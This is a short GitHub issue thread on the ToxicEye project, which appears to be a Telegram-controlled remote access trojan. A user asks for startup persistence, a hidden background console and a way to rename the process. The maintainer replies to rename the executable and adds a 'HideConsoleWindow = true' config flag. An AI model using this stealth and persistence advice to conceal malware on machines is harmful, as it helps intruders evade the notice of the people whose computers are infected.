### ISSUE TITLE
Add functions.

### ISSUE THREAD

**Issue by Dazmed707** [LimerBoy/ToxicEye#5]
Add startup, persistence skill and console can be hidden and run in the background

![imagen](https://user-images.githubusercontent.com/35184132/79925445-fcd5f180-83ff-11ea-8a0a-2c25a4b68570.png)

**Comment by LimerBoy** [comment]
![](https://i.ibb.co/SynS4xb/1.jpg)
![](https://i.ibb.co/yqBghKf/2.jpg)

**Comment by Dazmed707** [comment]
How to change name proccess (Telegram.rat) ?

**Comment by LimerBoy** [comment]
Reme exe file

**Comment by LimerBoy** [comment]
Added new config parameter. 
public static bool HideConsoleWindow = true;
